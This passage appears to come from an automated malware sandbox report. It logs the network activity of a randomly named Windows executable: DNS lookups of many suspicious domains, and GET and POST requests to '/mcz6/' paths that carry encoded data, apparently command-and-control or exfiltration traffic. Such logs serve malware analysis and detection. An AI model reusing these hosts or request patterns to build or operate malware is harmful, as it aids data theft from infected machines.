                                                    May 16, 2024 17:21:06.834656000 CEST8049740103.168.172.37192.168.2.9
                                                    May 16, 2024 17:21:06.834960938 CEST4974080192.168.2.9103.168.172.37
                                                    May 16, 2024 17:21:06.836740017 CEST4974080192.168.2.9103.168.172.37
                                                    May 16, 2024 17:21:06.887859106 CEST8049740103.168.172.37192.168.2.9
                                                    May 16, 2024 17:21:07.658236027 CEST8049740103.168.172.37192.168.2.9
                                                    May 16, 2024 17:21:07.701389074 CEST4974080192.168.2.9103.168.172.37
                                                    May 16, 2024 17:21:07.969113111 CEST8049740103.168.172.37192.168.2.9
                                                    May 16, 2024 17:21:07.969188929 CEST4974080192.168.2.9103.168.172.37
                                                    May 16, 2024 17:21:08.342179060 CEST4974080192.168.2.9103.168.172.37
                                                    May 16, 2024 17:21:09.361937046 CEST4974180192.168.2.9103.168.172.37
                                                    May 16, 2024 17:21:09.367019892 CEST8049741103.168.172.37192.168.2.9
                                                    May 16, 2024 17:21:09.367150068 CEST4974180192.168.2.9103.168.172.37
                                                    May 16, 2024 17:21:09.369940042 CEST4974180192.168.2.9103.168.172.37
                                                    May 16, 2024 17:21:09.374948025 CEST8049741103.168.172.37192.168.2.9
                                                    May 16, 2024 17:21:09.420994043 CEST8049741103.168.172.37192.168.2.9
                                                    May 16, 2024 17:21:10.088704109 CEST8049741103.168.172.37192.168.2.9
                                                    May 16, 2024 17:21:10.093367100 CEST8049741103.168.172.37192.168.2.9
                                                    May 16, 2024 17:21:10.093518972 CEST4974180192.168.2.9103.168.172.37
                                                    May 16, 2024 17:21:11.935194016 CEST4974180192.168.2.9103.168.172.37
                                                    May 16, 2024 17:21:12.939106941 CEST4974280192.168.2.9103.168.172.37
                                                    May 16, 2024 17:21:12.944066048 CEST8049742103.168.172.37192.168.2.9
                                                    May 16, 2024 17:21:12.950026035 CEST4974280192.168.2.9103.168.172.37
                                                    May 16, 2024 17:21:12.951994896 CEST4974280192.168.2.9103.168.172.37
                                                    May 16, 2024 17:21:13.000013113 CEST8049742103.168.172.37192.168.2.9
                                                    May 16, 2024 17:21:14.693639040 CEST8049742103.168.172.37192.168.2.9
                                                    May 16, 2024 17:21:14.795161009 CEST4974280192.168.2.9103.168.172.37
                                                    May 16, 2024 17:21:15.003943920 CEST8049742103.168.172.37192.168.2.9
                                                    May 16, 2024 17:21:15.004050970 CEST4974280192.168.2.9103.168.172.37
                                                    May 16, 2024 17:21:15.005039930 CEST4974280192.168.2.9103.168.172.37
                                                    May 16, 2024 17:21:15.013782978 CEST8049742103.168.172.37192.168.2.9
                                                    May 16, 2024 17:21:20.099391937 CEST4974380192.168.2.9104.37.39.71
                                                    May 16, 2024 17:21:20.104355097 CEST8049743104.37.39.71192.168.2.9
                                                    May 16, 2024 17:21:20.104557991 CEST4974380192.168.2.9104.37.39.71
                                                    May 16, 2024 17:21:20.106504917 CEST4974380192.168.2.9104.37.39.71
                                                    May 16, 2024 17:21:20.155953884 CEST8049743104.37.39.71192.168.2.9
                                                    May 16, 2024 17:21:20.928128958 CEST8049743104.37.39.71192.168.2.9
                                                    May 16, 2024 17:21:20.974327087 CEST4974380192.168.2.9104.37.39.71
                                                    May 16, 2024 17:21:21.241189003 CEST8049743104.37.39.71192.168.2.9
                                                    May 16, 2024 17:21:21.241235971 CEST4974380192.168.2.9104.37.39.71
                                                    May 16, 2024 17:21:21.607727051 CEST4974380192.168.2.9104.37.39.71
                                                    May 16, 2024 17:21:22.626288891 CEST4974480192.168.2.9104.37.39.71
                                                    May 16, 2024 17:21:22.631252050 CEST8049744104.37.39.71192.168.2.9
                                                    May 16, 2024 17:21:22.631395102 CEST4974480192.168.2.9104.37.39.71
                                                    May 16, 2024 17:21:22.633918047 CEST4974480192.168.2.9104.37.39.71
                                                    May 16, 2024 17:21:22.683861017 CEST8049744104.37.39.71192.168.2.9
                                                    May 16, 2024 17:21:23.629556894 CEST8049744104.37.39.71192.168.2.9
                                                    May 16, 2024 17:21:23.670124054 CEST4974480192.168.2.9104.37.39.71
                                                    May 16, 2024 17:21:23.929546118 CEST8049744104.37.39.71192.168.2.9
                                                    May 16, 2024 17:21:23.933932066 CEST4974480192.168.2.9104.37.39.71
                                                    May 16, 2024 17:21:24.141936064 CEST4974480192.168.2.9104.37.39.71
                                                    May 16, 2024 17:21:25.159159899 CEST4974580192.168.2.9104.37.39.71
                                                    May 16, 2024 17:21:25.164221048 CEST8049745104.37.39.71192.168.2.9
                                                    May 16, 2024 17:21:25.164299965 CEST4974580192.168.2.9104.37.39.71
                                                    May 16, 2024 17:21:25.166233063 CEST4974580192.168.2.9104.37.39.71
                                                    May 16, 2024 17:21:25.171094894 CEST8049745104.37.39.71192.168.2.9
                                                    May 16, 2024 17:21:25.216960907 CEST8049745104.37.39.71192.168.2.9
                                                    May 16, 2024 17:21:26.427087069 CEST8049745104.37.39.71192.168.2.9
                                                    May 16, 2024 17:21:26.485933065 CEST4974580192.168.2.9104.37.39.71
                                                    May 16, 2024 17:21:26.673924923 CEST4974580192.168.2.9104.37.39.71
                                                    May 16, 2024 17:21:27.707386971 CEST4974680192.168.2.9104.37.39.71
                                                    May 16, 2024 17:21:27.712357044 CEST8049746104.37.39.71192.168.2.9
                                                    May 16, 2024 17:21:27.712451935 CEST4974680192.168.2.9104.37.39.71
                                                    May 16, 2024 17:21:27.714375973 CEST4974680192.168.2.9104.37.39.71
                                                    May 16, 2024 17:21:27.764030933 CEST8049746104.37.39.71192.168.2.9
                                                    May 16, 2024 17:21:28.717398882 CEST8049746104.37.39.71192.168.2.9
                                                    May 16, 2024 17:21:28.765922070 CEST4974680192.168.2.9104.37.39.71
                                                    May 16, 2024 17:21:29.023097992 CEST8049746104.37.39.71192.168.2.9
                                                    May 16, 2024 17:21:29.023241043 CEST4974680192.168.2.9104.37.39.71
                                                    May 16, 2024 17:21:30.024355888 CEST4974680192.168.2.9104.37.39.71
                                                    May 16, 2024 17:21:30.029318094 CEST8049746104.37.39.71192.168.2.9
                                                    May 16, 2024 17:21:43.315769911 CEST4974780192.168.2.9199.59.243.225
                                                    May 16, 2024 17:21:43.320717096 CEST8049747199.59.243.225192.168.2.9
                                                    May 16, 2024 17:21:43.320795059 CEST4974780192.168.2.9199.59.243.225
                                                    May 16, 2024 17:21:43.322536945 CEST4974780192.168.2.9199.59.243.225
                                                    May 16, 2024 17:21:43.372037888 CEST8049747199.59.243.225192.168.2.9
                                                    May 16, 2024 17:21:43.887382984 CEST8049747199.59.243.225192.168.2.9
                                                    May 16, 2024 17:21:43.892095089 CEST8049747199.59.243.225192.168.2.9
                                                    May 16, 2024 17:21:43.894006968 CEST4974780192.168.2.9199.59.243.225
                                                    May 16, 2024 17:21:44.279480934 CEST8049747199.59.243.225192.168.2.9
                                                    May 16, 2024 17:21:44.281985044 CEST4974780192.168.2.9199.59.243.225
                                                    May 16, 2024 17:21:44.826555014 CEST4974780192.168.2.9199.59.243.225
                                                    May 16, 2024 17:21:45.844741106 CEST4974880192.168.2.9199.59.243.225
                                                    May 16, 2024 17:21:45.849765062 CEST8049748199.59.243.225192.168.2.9
                                                    May 16, 2024 17:21:45.849837065 CEST4974880192.168.2.9199.59.243.225
                                                    May 16, 2024 17:21:45.851510048 CEST4974880192.168.2.9199.59.243.225
                                                    May 16, 2024 17:21:45.908061981 CEST8049748199.59.243.225192.168.2.9
                                                    May 16, 2024 17:21:46.529448032 CEST8049748199.59.243.225192.168.2.9
                                                    May 16, 2024 17:21:46.534107924 CEST8049748199.59.243.225192.168.2.9
                                                    May 16, 2024 17:21:46.541924000 CEST4974880192.168.2.9199.59.243.225
                                                    May 16, 2024 17:21:46.935399055 CEST8049748199.59.243.225192.168.2.9
                                                    May 16, 2024 17:21:46.935600996 CEST4974880192.168.2.9199.59.243.225
                                                    May 16, 2024 17:21:47.733298063 CEST4974880192.168.2.9199.59.243.225
                                                    May 16, 2024 17:21:48.752171993 CEST4974980192.168.2.9199.59.243.225
                                                    May 16, 2024 17:21:48.757298946 CEST8049749199.59.243.225192.168.2.9
                                                    May 16, 2024 17:21:48.757368088 CEST4974980192.168.2.9199.59.243.225
                                                    May 16, 2024 17:21:48.759565115 CEST4974980192.168.2.9199.59.243.225
                                                    May 16, 2024 17:21:48.764508963 CEST8049749199.59.243.225192.168.2.9
                                                    May 16, 2024 17:21:48.812916994 CEST8049749199.59.243.225192.168.2.9
                                                    May 16, 2024 17:21:49.398210049 CEST8049749199.59.243.225192.168.2.9
                                                    May 16, 2024 17:21:49.402992010 CEST8049749199.59.243.225192.168.2.9
                                                    May 16, 2024 17:21:49.403009892 CEST8049749199.59.243.225192.168.2.9
                                                    May 16, 2024 17:21:49.403129101 CEST4974980192.168.2.9199.59.243.225
                                                    May 16, 2024 17:21:49.782943964 CEST8049749199.59.243.225192.168.2.9
                                                    May 16, 2024 17:21:49.783111095 CEST4974980192.168.2.9199.59.243.225
                                                    May 16, 2024 17:21:50.264045000 CEST4974980192.168.2.9199.59.243.225
                                                    May 16, 2024 17:21:51.269925117 CEST4975080192.168.2.9199.59.243.225
                                                    May 16, 2024 17:21:51.274900913 CEST8049750199.59.243.225192.168.2.9
                                                    May 16, 2024 17:21:51.275023937 CEST4975080192.168.2.9199.59.243.225
                                                    May 16, 2024 17:21:51.276734114 CEST4975080192.168.2.9199.59.243.225
                                                    May 16, 2024 17:21:51.327846050 CEST8049750199.59.243.225192.168.2.9
                                                    May 16, 2024 17:21:52.385963917 CEST8049750199.59.243.225192.168.2.9
                                                    May 16, 2024 17:21:52.390695095 CEST8049750199.59.243.225192.168.2.9
                                                    May 16, 2024 17:21:52.390800953 CEST4975080192.168.2.9199.59.243.225
                                                    May 16, 2024 17:21:52.761162043 CEST8049750199.59.243.225192.168.2.9
                                                    May 16, 2024 17:21:52.761378050 CEST4975080192.168.2.9199.59.243.225
                                                    May 16, 2024 17:21:52.762284040 CEST4975080192.168.2.9199.59.243.225
                                                    May 16, 2024 17:21:52.771821976 CEST8049750199.59.243.225192.168.2.9

                                                    UDP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    May 16, 2024 17:18:46.281903028 CEST5984253192.168.2.91.1.1.1
                                                    May 16, 2024 17:18:46.318281889 CEST53598421.1.1.1192.168.2.9
                                                    May 16, 2024 17:19:03.737169027 CEST4949253192.168.2.91.1.1.1
                                                    May 16, 2024 17:19:03.759160042 CEST53494921.1.1.1192.168.2.9
                                                    May 16, 2024 17:19:19.260643005 CEST6226853192.168.2.91.1.1.1
                                                    May 16, 2024 17:19:19.350558996 CEST53622681.1.1.1192.168.2.9
                                                    May 16, 2024 17:19:48.417943001 CEST5119353192.168.2.91.1.1.1
                                                    May 16, 2024 17:19:48.459769011 CEST53511931.1.1.1192.168.2.9
                                                    May 16, 2024 17:20:02.230272055 CEST6304553192.168.2.91.1.1.1
                                                    May 16, 2024 17:20:03.037931919 CEST53630451.1.1.1192.168.2.9
                                                    May 16, 2024 17:20:25.971894026 CEST4999653192.168.2.91.1.1.1
                                                    May 16, 2024 17:20:26.148905993 CEST53499961.1.1.1192.168.2.9
                                                    May 16, 2024 17:20:39.596889973 CEST5038253192.168.2.91.1.1.1
                                                    May 16, 2024 17:20:39.629744053 CEST53503821.1.1.1192.168.2.9
                                                    May 16, 2024 17:20:47.689915895 CEST6242453192.168.2.91.1.1.1
                                                    May 16, 2024 17:20:47.707596064 CEST53624241.1.1.1192.168.2.9
                                                    May 16, 2024 17:20:55.767719984 CEST5074253192.168.2.91.1.1.1
                                                    May 16, 2024 17:20:55.798949957 CEST53507421.1.1.1192.168.2.9
                                                    May 16, 2024 17:21:03.863369942 CEST5908953192.168.2.91.1.1.1
                                                    May 16, 2024 17:21:04.290478945 CEST53590891.1.1.1192.168.2.9
                                                    May 16, 2024 17:21:20.027964115 CEST5760253192.168.2.91.1.1.1
                                                    May 16, 2024 17:21:20.094080925 CEST53576021.1.1.1192.168.2.9
                                                    May 16, 2024 17:21:35.033628941 CEST6193753192.168.2.91.1.1.1
                                                    May 16, 2024 17:21:35.046552896 CEST53619371.1.1.1192.168.2.9
                                                    May 16, 2024 17:21:43.112194061 CEST5920053192.168.2.91.1.1.1
                                                    May 16, 2024 17:21:43.313507080 CEST53592001.1.1.1192.168.2.9
                                                    May 16, 2024 17:21:57.769927025 CEST5815353192.168.2.91.1.1.1
                                                    May 16, 2024 17:21:57.805222988 CEST53581531.1.1.1192.168.2.9
                                                    May 16, 2024 17:22:05.861922979 CEST5874253192.168.2.91.1.1.1
                                                    May 16, 2024 17:22:05.880093098 CEST53587421.1.1.1192.168.2.9

                                                    DNS Queries

                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                    May 16, 2024 17:18:46.281903028 CEST192.168.2.91.1.1.10xa694Standard query (0)www.dty377.comA (IP address)IN (0x0001)false
                                                    May 16, 2024 17:19:03.737169027 CEST192.168.2.91.1.1.10xa5b3Standard query (0)www.lenslaser.comA (IP address)IN (0x0001)false
                                                    May 16, 2024 17:19:19.260643005 CEST192.168.2.91.1.1.10x2f2cStandard query (0)www.allinone24.shopA (IP address)IN (0x0001)false
                                                    May 16, 2024 17:19:48.417943001 CEST192.168.2.91.1.1.10x603aStandard query (0)www.carliente.comA (IP address)IN (0x0001)false
                                                    May 16, 2024 17:20:02.230272055 CEST192.168.2.91.1.1.10x9287Standard query (0)www.walletweb367.topA (IP address)IN (0x0001)false
                                                    May 16, 2024 17:20:25.971894026 CEST192.168.2.91.1.1.10xef21Standard query (0)www.deaybrid.infoA (IP address)IN (0x0001)false
                                                    May 16, 2024 17:20:39.596889973 CEST192.168.2.91.1.1.10x6f1Standard query (0)www.prizesupermarket.comA (IP address)IN (0x0001)false
                                                    May 16, 2024 17:20:47.689915895 CEST192.168.2.91.1.1.10x2fdcStandard query (0)www.jrksa.infoA (IP address)IN (0x0001)false
                                                    May 16, 2024 17:20:55.767719984 CEST192.168.2.91.1.1.10x969cStandard query (0)www.cookedatthebottom.comA (IP address)IN (0x0001)false
                                                    May 16, 2024 17:21:03.863369942 CEST192.168.2.91.1.1.10x8a39Standard query (0)www.celebration24.co.ukA (IP address)IN (0x0001)false
                                                    May 16, 2024 17:21:20.027964115 CEST192.168.2.91.1.1.10xc2c5Standard query (0)www.gledingakademiet.noA (IP address)IN (0x0001)false
                                                    May 16, 2024 17:21:35.033628941 CEST192.168.2.91.1.1.10xb704Standard query (0)www.alfaspa.netA (IP address)IN (0x0001)false
                                                    May 16, 2024 17:21:43.112194061 CEST192.168.2.91.1.1.10xfeb6Standard query (0)www.zwervertjes.beA (IP address)IN (0x0001)false
                                                    May 16, 2024 17:21:57.769927025 CEST192.168.2.91.1.1.10x6c3eStandard query (0)www.maerealtysg.comA (IP address)IN (0x0001)false
                                                    May 16, 2024 17:22:05.861922979 CEST192.168.2.91.1.1.10xb7adStandard query (0)www.polhi.lolA (IP address)IN (0x0001)false

                                                    DNS Answers

                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                    May 16, 2024 17:18:01.724160910 CEST1.1.1.1192.168.2.90x1ee6No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                    May 16, 2024 17:18:01.724160910 CEST1.1.1.1192.168.2.90x1ee6No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                    May 16, 2024 17:18:46.318281889 CEST1.1.1.1192.168.2.90xa694No error (0)www.dty377.comdty377.comCNAME (Canonical name)IN (0x0001)false
                                                    May 16, 2024 17:18:46.318281889 CEST1.1.1.1192.168.2.90xa694No error (0)dty377.com3.33.130.190A (IP address)IN (0x0001)false
                                                    May 16, 2024 17:18:46.318281889 CEST1.1.1.1192.168.2.90xa694No error (0)dty377.com15.197.148.33A (IP address)IN (0x0001)false
                                                    May 16, 2024 17:19:03.759160042 CEST1.1.1.1192.168.2.90xa5b3No error (0)www.lenslaser.comlenslaser.comCNAME (Canonical name)IN (0x0001)false
                                                    May 16, 2024 17:19:03.759160042 CEST1.1.1.1192.168.2.90xa5b3No error (0)lenslaser.com162.241.216.140A (IP address)IN (0x0001)false
                                                    May 16, 2024 17:19:19.350558996 CEST1.1.1.1192.168.2.90x2f2cNo error (0)www.allinone24.shopallinonestore-567794-react-native.b567794.prod.eastus.az.svc.builder.aiCNAME (Canonical name)IN (0x0001)false
                                                    May 16, 2024 17:19:19.350558996 CEST1.1.1.1192.168.2.90x2f2cNo error (0)allinonestore-567794-react-native.b567794.prod.eastus.az.svc.builder.ai57.151.38.169A (IP address)IN (0x0001)false
                                                    May 16, 2024 17:19:48.459769011 CEST1.1.1.1192.168.2.90x603aNo error (0)www.carliente.comcarliente.comCNAME (Canonical name)IN (0x0001)false
                                                    May 16, 2024 17:19:48.459769011 CEST1.1.1.1192.168.2.90x603aNo error (0)carliente.com217.160.0.111A (IP address)IN (0x0001)false
                                                    May 16, 2024 17:20:03.037931919 CEST1.1.1.1192.168.2.90x9287No error (0)www.walletweb367.top91.195.240.123A (IP address)IN (0x0001)false
                                                    May 16, 2024 17:20:26.148905993 CEST1.1.1.1192.168.2.90xef21No error (0)www.deaybrid.info162.0.237.22A (IP address)IN (0x0001)false
                                                    May 16, 2024 17:20:39.629744053 CEST1.1.1.1192.168.2.90x6f1Name error (3)www.prizesupermarket.comnonenoneA (IP address)IN (0x0001)false
                                                    May 16, 2024 17:20:47.707596064 CEST1.1.1.1192.168.2.90x2fdcName error (3)www.jrksa.infononenoneA (IP address)IN (0x0001)false
                                                    May 16, 2024 17:20:55.798949957 CEST1.1.1.1192.168.2.90x969cName error (3)www.cookedatthebottom.comnonenoneA (IP address)IN (0x0001)false
                                                    May 16, 2024 17:21:04.290478945 CEST1.1.1.1192.168.2.90x8a39No error (0)www.celebration24.co.uk103.168.172.37A (IP address)IN (0x0001)false
                                                    May 16, 2024 17:21:04.290478945 CEST1.1.1.1192.168.2.90x8a39No error (0)www.celebration24.co.uk103.168.172.52A (IP address)IN (0x0001)false
                                                    May 16, 2024 17:21:20.094080925 CEST1.1.1.1192.168.2.90xc2c5No error (0)www.gledingakademiet.no104.37.39.71A (IP address)IN (0x0001)false
                                                    May 16, 2024 17:21:35.046552896 CEST1.1.1.1192.168.2.90xb704Name error (3)www.alfaspa.netnonenoneA (IP address)IN (0x0001)false
                                                    May 16, 2024 17:21:43.313507080 CEST1.1.1.1192.168.2.90xfeb6No error (0)www.zwervertjes.be199.59.243.225A (IP address)IN (0x0001)false
                                                    May 16, 2024 17:21:57.805222988 CEST1.1.1.1192.168.2.90x6c3eName error (3)www.maerealtysg.comnonenoneA (IP address)IN (0x0001)false
                                                    May 16, 2024 17:22:05.880093098 CEST1.1.1.1192.168.2.90xb7adName error (3)www.polhi.lolnonenoneA (IP address)IN (0x0001)false

                                                    HTTP Request Dependency Graph

                                                    • www.dty377.com
                                                    • www.lenslaser.com
                                                    • www.allinone24.shop
                                                    • www.carliente.com
                                                    • www.walletweb367.top
                                                    • www.deaybrid.info
                                                    • www.celebration24.co.uk
                                                    • www.gledingakademiet.no
                                                    • www.zwervertjes.be

                                                    HTTP Packets

                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    0192.168.2.9497133.33.130.190801016C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exe
                                                    TimestampBytes transferredDirectionData
                                                    May 16, 2024 17:18:46.331711054 CEST470OUTGET /mcz6/?-xl=hBllB6kp4D1dBFK&1Joh=D5+pF2/O5onkRgswN5mCVTTvHr6l6Q5GMQdzYj/9XZpkwzi9ddj0crwo6H79wSPqAuXYaDgjxYH65NOwo1DiEBBB3RCutNlD9KPyQG6aNo0jRjsCiw== HTTP/1.1
                                                    Host: www.dty377.com
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Language: en-US,en;q=0.9
                                                    Connection: close
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
                                                    May 16, 2024 17:18:48.392440081 CEST396INHTTP/1.1 200 OK
                                                    Server: openresty
                                                    Date: Thu, 16 May 2024 15:18:47 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 256
                                                    Connection: close
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 2d 78 6c 3d 68 42 6c 6c 42 36 6b 70 34 44 31 64 42 46 4b 26 31 4a 6f 68 3d 44 35 2b 70 46 32 2f 4f 35 6f 6e 6b 52 67 73 77 4e 35 6d 43 56 54 54 76 48 72 36 6c 36 51 35 47 4d 51 64 7a 59 6a 2f 39 58 5a 70 6b 77 7a 69 39 64 64 6a 30 63 72 77 6f 36 48 37 39 77 53 50 71 41 75 58 59 61 44 67 6a 78 59 48 36 35 4e 4f 77 6f 31 44 69 45 42 42 42 33 52 43 75 74 4e 6c 44 39 4b 50 79 51 47 36 61 4e 6f 30 6a 52 6a 73 43 69 77 3d 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                    Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?-xl=hBllB6kp4D1dBFK&1Joh=D5+pF2/O5onkRgswN5mCVTTvHr6l6Q5GMQdzYj/9XZpkwzi9ddj0crwo6H79wSPqAuXYaDgjxYH65NOwo1DiEBBB3RCutNlD9KPyQG6aNo0jRjsCiw=="}</script></head></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    1192.168.2.949714162.241.216.140801016C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exe
                                                    TimestampBytes transferredDirectionData
                                                    May 16, 2024 17:19:03.768347025 CEST732OUTPOST /mcz6/ HTTP/1.1
                                                    Host: www.lenslaser.com
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Language: en-US,en;q=0.9
                                                    Accept-Encoding: gzip, deflate, br
                                                    Origin: http://www.lenslaser.com
                                                    Referer: http://www.lenslaser.com/mcz6/
                                                    Connection: close
                                                    Content-Length: 193
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
                                                    Data Raw: 31 4a 6f 68 3d 75 72 34 68 55 52 48 36 48 6b 58 37 54 37 75 44 41 77 56 54 58 31 58 64 76 64 34 44 32 46 4c 56 56 41 6e 75 6a 79 34 73 6d 37 4d 36 64 6d 77 54 65 36 2b 34 6c 30 59 68 58 38 30 5a 36 56 57 30 30 35 73 2b 39 50 54 79 46 75 68 50 5a 4e 6c 61 4e 41 4f 6a 38 49 66 44 41 79 53 76 70 2b 50 36 65 43 63 53 70 4a 63 50 4e 39 51 56 2b 51 47 58 6b 6f 55 64 78 2b 6d 38 31 38 36 46 72 72 66 64 72 61 30 50 53 49 38 52 52 6e 76 38 36 42 6d 34 35 65 2b 4c 36 78 78 77 48 68 45 57 74 65 4d 74 4b 56 61 53 6b 48 6c 75 38 33 50 4c 61 58 2b 64 56 55 47 57 72 63 4b 72 4e 71 67 71
                                                    Data Ascii: 1Joh=ur4hURH6HkX7T7uDAwVTX1Xdvd4D2FLVVAnujy4sm7M6dmwTe6+4l0YhX80Z6VW005s+9PTyFuhPZNlaNAOj8IfDAySvp+P6eCcSpJcPN9QV+QGXkoUdx+m8186Frrfdra0PSI8RRnv86Bm45e+L6xxwHhEWteMtKVaSkHlu83PLaX+dVUGWrcKrNqgq
                                                    May 16, 2024 17:19:05.125972033 CEST479INHTTP/1.1 404 Not Found
                                                    Date: Thu, 16 May 2024 15:19:04 GMT
                                                    Server: Apache
                                                    Content-Length: 315
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    2192.168.2.949716162.241.216.140801016C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exe
                                                    TimestampBytes transferredDirectionData
                                                    May 16, 2024 17:19:06.306803942 CEST756OUTPOST /mcz6/ HTTP/1.1
                                                    Host: www.lenslaser.com
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Language: en-US,en;q=0.9
                                                    Accept-Encoding: gzip, deflate, br
                                                    Origin: http://www.lenslaser.com
                                                    Referer: http://www.lenslaser.com/mcz6/
                                                    Connection: close
                                                    Content-Length: 217
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
                                                    Data Raw: 31 4a 6f 68 3d 75 72 34 68 55 52 48 36 48 6b 58 37 53 62 2b 44 44 54 39 54 56 56 58 65 6a 39 34 44 2f 6c 4c 52 56 41 62 75 6a 32 4a 70 6d 49 34 36 64 48 73 54 66 37 2b 34 6d 30 59 68 50 4d 30 63 6e 46 57 76 30 35 51 32 39 4f 76 79 46 75 31 50 5a 4a 68 61 4e 33 36 69 2b 59 66 4e 56 69 53 2b 30 4f 50 36 65 43 63 53 70 4a 49 31 4e 39 34 56 2b 67 57 58 6c 4a 55 65 76 75 6d 2f 79 38 36 46 76 72 66 52 72 61 30 39 53 4b 5a 30 52 6c 6e 38 36 41 57 34 2b 50 2b 45 6a 42 77 37 44 68 46 47 6a 63 78 4a 52 6e 61 49 6c 55 4a 6e 71 47 32 73 51 57 65 44 45 6d 50 4e 2b 4c 4b 4d 4b 4e 70 43 63 55 4e 32 62 37 57 67 61 47 74 48 68 66 45 68 58 45 43 52 37 77 3d 3d
                                                    Data Ascii: 1Joh=ur4hURH6HkX7Sb+DDT9TVVXej94D/lLRVAbuj2JpmI46dHsTf7+4m0YhPM0cnFWv05Q29OvyFu1PZJhaN36i+YfNViS+0OP6eCcSpJI1N94V+gWXlJUevum/y86FvrfRra09SKZ0Rln86AW4+P+EjBw7DhFGjcxJRnaIlUJnqG2sQWeDEmPN+LKMKNpCcUN2b7WgaGtHhfEhXECR7w==
                                                    May 16, 2024 17:19:07.694478989 CEST479INHTTP/1.1 404 Not Found
                                                    Date: Thu, 16 May 2024 15:19:06 GMT
                                                    Server: Apache
                                                    Content-Length: 315
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
